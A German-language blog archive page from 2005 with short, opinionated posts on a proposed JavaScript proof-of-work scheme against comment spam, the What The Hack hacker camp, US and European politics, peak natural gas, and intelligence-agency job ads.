[l] Als ich mich gerade mal wieder über ein Blog mit Captchas geärgert habe, fiel mir auf, daß heutige Browser dank Javascript ja eigentlich perfekt für Verfahren wie HashCash einsetzbar wären. Wieso implementiert niemand sowas? Nehmen wir an, jemand will bei mir einen Kommentar submitten. Ich schreibe als POST-URL der Form http://teergrube-fuer-fiese-spammer.fefe.de/ ins HTML, und überschreibe das dann mit Javascript. Beim Laden der Seite startet ein Javascript, der dann die Aufgabe kriegt, für den MD5-Hash e807f1fcf82d132f9bb018ca6738a19f einen String zu finden, der diesen Hash hat. Das wird er durch Ausprobieren tun müssen, und der Server kann den zu findenden String von der Länge her so wählen, daß das Javascript eine Minute dafür braucht auf einem aktuellen PC. Der gefundene String wird dann als Teil der URL übergeben, d.h. wenn der String gefunden ist, erzeugt das Javascript als POST-URL http://kommentare.fefe.de/post/1234567890 (1234567890 hat den obigen Hash). Der Server muss dann gucken, ob MD5 von dem übergebenen String dem gestellten Hash entspricht. MD5 ist hier nur ein Beispiel fürs Verständnis, eigentlich will man kein MD5 sondern eine in Javascript besonders effizient ausführbare Funktion, damit ein Spammer, der das in C nach implementiert, nicht substanziell schneller ist. Die Idee dabei ist, daß es für Spammer teuer gemacht wird, da ihren Spam abzuladen. Mehrere Fragen stellen sich: reicht eine für User erträgliche Wartezeit, um das für Spammer teuer genug zu machen? Wie stellt man das Problem so, daß der Server stateless das Problem rekonstruieren kann, das er dem Client gestellt hat, ohne da auf eine Datenbank zugreifen zu müssen?

Thu Jul 28 2005

[l] Langsam kehrt hier auf der WTH Hitze ein — starke Hitze, vergleichbar mit dem letzten CCC Camp. Die Leute haben schon an der Seite die Zeltwände hochgeschlagen, damit Luftzug entstehen kann, aber es war trotzdem praktisch nur in den Ecken erträglich, weil dort die Luft durch zieht. Note to self: nächstes Mal einen Fächer mitbringen! Es hat sich bewehrt, eine Kopfbedeckung gegen Sonnenstich und eine Sonnenbrille dabei zu haben. Nachts ist es trotzdem empfindlich kühl und es war auch gut, daß ich Schlafsack und Decke mitgebracht habe. Kurz: Gepäck war dieses Mal genau richtig gepackt. Die ersten Veranstaltungen fallen übrigens schon aus. Offenbar hat die Niederländische Regierung Streß bei der Visavergabe gemacht und einigen Sprechern kein Visum erteilt, u.a. dem, der über Internet an der Elfenbeinküsten reden wollte. Die Niederländer sind echt faschistisch geworden in den letzten 3 Jahren, und im Gegensatz zu Deutschland gibt es hier so gut wie keine Protestkultur. Die Leute nahmen das halt hin.

Wed Jul 27 2005

[l] Und auf geht's zur What The Hack; mit dem Aldi-Zelt und der Lidl-Luftmatratze, das wird sicher der totale Bringer… jetzt müsste nur noch das mit dem Regen aufhören, dann hat die Veranstaltung richtig Potenzial. Oh und ich freue mich schon auf die Fnord News Show am letzten Tag, wir haben uns da schon ein paar Gedanken gemacht…

Sat Jul 23 2005

[l] Auf einer fetten Comic-Con hat doch echt jemand einen Stand aufgemacht, und dort Raubkopie-DVDs verkauft :-) Direkt neben den Ständen der Hersteller der Filme. Die MPAA fand das wohl nicht so lustig.

Wed Jul 13 2005

[l] Bei den Londoner Bombenanschlägen hat New York erst mal die GSM-Repeater in den Tunneln nach Manhattan ausgemacht, weil man ja mit einem Handy eine Bombe zünden kann. Rückblickend findet der Bürgermeister das nicht so schlau, weil die Leute dann ja auch nicht in einem Notfall Hilfe rufen können.

Tue Jul 12 2005

[l] Weil man sich nie genug über die US-Fundi-"Christen" lustig machen kann: Hunderte strömen zu Straßenlaterne, deren Schatten wie Jesus aussehen soll. Die Polizei hat dann die Lampe ausgemacht. :-)

Thu Jul 7 2005

[l] Auf einer Fahrradtour zur Fusion haben ein paar Bekannte eine interessante Installation gesehen und tolle Fotos gemacht. Erstmal stellt sich natürlich generell die Frage: WTF?! Aber auch einige Details sind interessant. Das Doppelschloß auf dem 3. Bild finde ich rein physisch unklar, wie das funktionieren soll, und das Schild auf Bild 4 ist ja wohl echt großartig. "Der Eigentümer", HAHA. Es hat gewisse Ähnlichkeit mit dem Kraftfeldgenerator vom Todessternuplink auf Endor, wenn ihr mich fragt :-)
[l] Und hier die schlechte Security-Idee des Jahres: Banktransaktionen an Handy-Nachrichten koppeln. Was passiert, wenn mir jemand das Handy klaut? Dann komm ich nicht mehr an mein Konto ran! Oder nehmen wir an, der Automat steht an einer Stelle, wo man keine Deckung hat? Oder die SMS braucht mal nen Tag (kommt durchaus vor, vielleicht ist das in Japan besser)…? Die gröbsten Hämmer werden immer im Namen der Sicherheit gemacht.
[l] Die Army wirft noch mal 5 Milliarden Dollar zu Halliburton. Ist ja auch klar, so gute Erfahrungen wie sie mit denen gemacht haben…

Mon Jul 4 2005

[l] Och, keiner will Intel Geld schenken… *träneausdrück* Weder Irland, noch die USA, noch Israel wollen Intel eine Fab subventionieren. Hätten sie es mal in Sachsen gemacht!

Sat Jul 2 2005

[l] Nachdem Time Inc. sich entschieden hat, seine Informanten dem Gericht offen zu legen, will MSNBC erfahren haben, daß das Leck Karl Rove ist (der fiese Imperator hinter Bush). Wenn das war ist, hat Karl Rove sich strafbar gemacht, indem er die Geheimidentität einer Bundesagentin verraten hat, und kann dafür empfindlich belangt werden. Oh wie wäre das schön! :-)

Thu Jun 30 2005

[l] Nach dem Öl-Peak jetzt der Erdgas-Peak: Der Exxon-CEO sagt in einem Interview, daß die Erdgas-Förderung ihr Limit erreicht hat. Das heißt erst mal nicht, daß es kein Erdgas mehr gibt, sondern daß man die Förderung nicht wird steigern können, und sie ab jetzt nur noch weniger werden wird. Das ist aus mehreren Gründen eine besonders schlechte Nachricht: erstens wird der Dünger, von dem die Landwirtschaft abhängt, aus Erdgas gemacht. Damit ist also die US-Landwirtschaft an ihrem Limit. Der andere Grund ist, daß Erdgas der wichtigste Teil des Energie-Mix der Welt ist: Atomstrom und Kohle braucht ewig lange zum Anfahren (kann daher nicht mal eben dazu geschaltet werden), Solar- und Windenergie sind vom Wetter abhängig, und Wasserkraft gibt es nicht so viel. Die Kraftwerke, die man mal eben dazu schaltet, wenn in der Pause beim Super Bowl alle pinkeln gehen und dazu das Licht im Klo anmachen, das sind alles Gaskraftwerke. Und weil die so toll funktionieren sind in den letzten Jahren in den USA über 200 neue Gaskraftwerke gebaut worden, aber unter 50 andere (ich finde leider gerade die Quelle nicht mehr, wo ich das gelesen hatte). Kurz gesagt: jetzt haben sie ein krasses Problem. Verschärfend kommt hinzu, daß man Erdgas nicht gut per Schiff transportieren kann, nur per Pipeline, und das schränkt Importquellen stark ein, wie man sich denken kann.

Fri Jun 17 2005

[l] Chertoff hatte nach einem Bericht der New York Times den Abgeordneten deutlich gemacht, dass er "keine endlosen Debatten" über Datenschutzfragen wünsche. Die Amis haben echt ne Klatsche.

Wed Jun 8 2005

[l] Auch die Briten haben ihren NASA-Hacker. Natürlich haben ihn die PR-Abteilungen der Regierungen gleich zum gefährlichsten Hacker aller Zeiten gemacht, damit das auch in allen Medien auftaucht :-( Interessantes Detail: völlig unmotiviert steht in der Spiegel-Story zum Thema unten drin, daß das Israelische Militär über eine Sicherheitslücke in ihren Computersystemen aufgemacht wurde (Danke, Julian)

Sun Jun 5 2005

[l] Die NSA wird gerade zur Lachnummer umgebaut. Die outsourcen ihre Technik und ihre Netze. Und beim Outsourcing besonders billig zu sein, ist genau der Arbeitsmodus vom Mossad. Der Artikel erzählt von krasser Korruption in der NSA, und wie die Israelis den Dienste-Apparat der USA systematisch unterwandern. Ich weiß gar nicht, was ich schlimmer finden soll: daß die ihre SIGINT-Daten auf Windows-Kisten lagern, oder daß deren Administration jetzt vom Mossad gemacht wird. Lesenswert! (Danke, Frank)

Tue May 10 2005

[l] Gute Nachricht: die 21c3-Videos sind fertig encoded. Leider ist die externe Platte kaputt gegangen, auf der sie drauf waren. Glücklicherweise stellte sich heraus, daß es wohl nur der USB-Wandler-Chip war, den es gerissen hat, die Daten selbst sind noch auf der Platte. Ich habe jetzt mal dezentral ein Backup im CCCB gemacht, und hoffe daß die CCCB-Mitglieder dann auch fleißig seeden werden, sobald die Videos per Torrent verfügbar sind. Wenn alles gut läuft, wird das am Wochenende soweit sein.

Mon May 9 2005

[l] Blair sieht sich - nur wenige Tage nach seiner Wiederwahl - Rücktrittsaufforderungen aus seiner eigenen Partei ausgesetzt. Die Leute wollen halt den Brown als Premier haben. Ach ja, lustiges Detail: Blunkett (der Schily+Ashcroft Englands) ist nach seinem Skandalrücktritt als Innenminister nicht etwa arbeitslos, sondern wird für die Rentenkassen zuständig sein. Das nenne ich mal einen politischen Absturz. Bei uns hätte man ihn vermutlich zum Verteidigungsminister gemacht, das ist auch so ein Schleudersitz für abgehalfterte Verlierer.

Sun May 8 2005

[l] Wunderbares Essay von Hans Magnus Enzensberger. "Ein deutscher Politiker, nennen wir ihn der Einfachheit halber M., hat vor wenigen Wochen eine sensationelle Entdeckung gemacht. Er hat nämlich festgestellt, dass sich hinter der harmlosen Tarnbezeichnung "die Wirtschaft", was ja bis dahin kaum jemand geahnt hat, der schiere Kapitalismus verbirgt".

Sat May 7 2005

[l] 93jähriger mit Morsecode hängt 13jährige mit SMS deutlich ab, obwohl das Mädchen "liberal use of slang" gemacht hat :-)

Thu May 5 2005

[l] Ich interessiere mich ja immer für Geheimdienste und was die so treiben, und habe heute mal ein bißchen rumgegoogelt, und bin erstaunt, wie viele Jobs die US Dienste für Leute mit Top Secret Clearance ausgeschrieben haben. Es gibt sogar eigene Jobsuche-Webseiten nur für Leute mit Clearance!. Und wenn man nach TS/SCI sucht (Top Secret / Sensitive Compartmentalized Information; zu steigern noch mit "Polygraph" aka Lügendetektor), findet man die bizarrsten Jobabzeigen (auch NOFORN ist ein gutes Stichwort für Google). So sieht man, woran die gerade arbeiten, und gewinnt auch einen kleinen Einblick, mit was für Mitteln sie ihre Probleme lösen. Z.B. wird das Navy-System für Strafverfolgung in Java mit ColdFusion und Oracle-Backend gemacht (und sie möchten SOAP-Erfahrung). Das National Counter Terrorist Center benutzt MS Office und Lotus Notes. Noch interessanter ist aber der hier: Cloudshield sucht jemanden, der C kann und ihnen unter Linux TCP/IP-Pakete parsen kann, sich mit Firewalls und IDS auskennt, und Top Secret Clearance hat; Cloudshield selbst sieht eh schon wie ein NSA Zulieferer aus von ihren Produkten her — Gigabit Realtime Datenuntersuchung von durchlaufenden Streams… wer will sowas sonst haben? Interessant ist auch, was so ein Technologie-Pionier für Antennenbau und RF Engineering so verdient: 100000 Dollar pro Jahr. Mit so viel hätte ich nicht gerechnet, ehrlich gesagt.

Wed May 4 2005

[l] Pakistan faßt die "Nummer drei" von Al Kaida. Der Mann war der Nachfolger von Scheich Mohammed, den sie 2003 verhaftet haben. So macht man sich "wichtige" Gegner. Natürlich kann jetzt niemand in den zitierten "Sicherheitskreisen" zugeben, daß der Mann keine Rolle gespielt hat (was hat Al Kaida denn seit 2003 alles gefährliches gemacht?), sondern alle sind sich einig, daß ein großer Schlag gelungen ist, man klopft sich gegenseitig auf die Schultern, und alles geht weiter wie gehabt.
[l] Überhaupt weht den Amis in Südamerika ein steifer Wind entgegen: Das Pentagon kann in Südamerika kaum Militärhilfe an Nachbarn von unbequemen Staaten vergeben, weil (haltet euch fest) ein Gesetz von 1998 vorschreibt, daß Militärhilfe nur an Länder gehen darf, die den internationalen Gerichtshof entweder nicht anerkennen oder die mit den USA eine gegenseitige Immunitätserklärung bezüglich des ICC unterschrieben haben. Von den 22 Staaten weltweit, die das nicht gemacht haben, sind 11 in Lateinamerika. Insbesondere haben sie Probleme, etwas gegen Chavez zu tun. Aber der eigentliche Hammer in dem Artikel ist: From January 2004 to November 2004, China invested nearly $900 million in Latin America, or 49.3 percent of its overseas investment. National level defense officials from China visited Latin American and Caribbean countries 20 times last year. Offensichtlich läuft das Brzezinski-Mearsheimer Szenario bereits auf vollen Touren!
[l] Der Bolton hat auch den Biowaffensperrvertrag kaputt gemacht

Mon May 2 2005

[l] HAHAHAHA, ".de" ist jetzt komplett in rfc-ignorant.org gelistet! Weil das DENIC den whois kaputt gemacht hat. Zu schön! :-)

Fri Apr 29 2005

[l] Ich halte die Grünen ja prinzipiell für unwählbar, seit sie ihre ganzen Wahlversprechen gebrochen haben, und Schily, Zypries und die Schmidt von der Leine gelassen haben, aber diese Aktion hier (Cem Özdemir beschwert sich, daß sie nur Windows-Notebooks in Netz lassen) könnte mich fast umstimmen. Leider will er da mit Apple ins Netz statt mit Linux. Aber ich begrüße es immer, wenn verkrusteten Windows-Strukturen mal etwas Feuer unter dem Arsch gemacht wird.

Tue Apr 26 2005

[l] Da hat sich jemand die Mühe gemacht, Google und MSN Search nach Sachen zu fragen, und dann zu gucken, unter welchen Webservern die Antworten laufen. Und es stellt sich heraus, daß bei MSN Search mehr IIS-Sites gelistet werden (von Slashdot). Sehr schön!

Sun Apr 24 2005

[l] Die Suche nach dem Bernsteinzimmer ist vorbei. Die Rote Armee hat es versehentlich kaputt gemacht, in einem Schloß in Königsberg.

Mon Apr 11 2005

[l] Talabani ernennt Schiiten zum Irakischen Premier. An sich fand ich es ja sehr besorgniserregend, daß die Amerikaner im Irak ausgerechnet einen Kurden (die ja uniform von allen anderen gehaßt werden) zum Präsidenten gemacht haben. Ist doch klar, daß alle den für eine Marionette halten werden, denn mehrheitsfähig sind die Kurden sicher nicht im Irak. Aber er scheint ja doch bemüht zu sein, jetzt einen guten Job zu machen. Man darf gespannt sein, ob er das Ende seiner Amtszeit erlebt, bei der Situation da gerade.

ganzer Monat

Proudly made without AI, Blockchain, PHP, Java, Perl, MySQL and Postgres
Impressum, Datenschutz

2004	4.06
2005	3.8
2006	3.69
2007	3.55
2008	2.65
2009	3.15
2010	3.8
2011	3.35